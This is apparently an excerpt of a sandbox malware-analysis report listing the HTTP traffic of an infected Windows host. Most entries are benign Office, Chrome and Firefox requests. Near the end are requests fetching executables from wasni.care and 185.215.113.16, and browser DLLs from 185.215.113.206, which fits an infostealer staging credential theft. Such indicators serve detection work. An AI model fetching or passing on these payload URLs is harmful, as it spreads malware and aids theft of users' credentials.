                          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /panel/uploads/Fwkdsz.exe HTTP/1.1Host: wasni.care
                          Source: global trafficHTTP traffic detected: GET /panel/uploads/Luvzkkz.mp4 HTTP/1.1Host: wasni.careConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
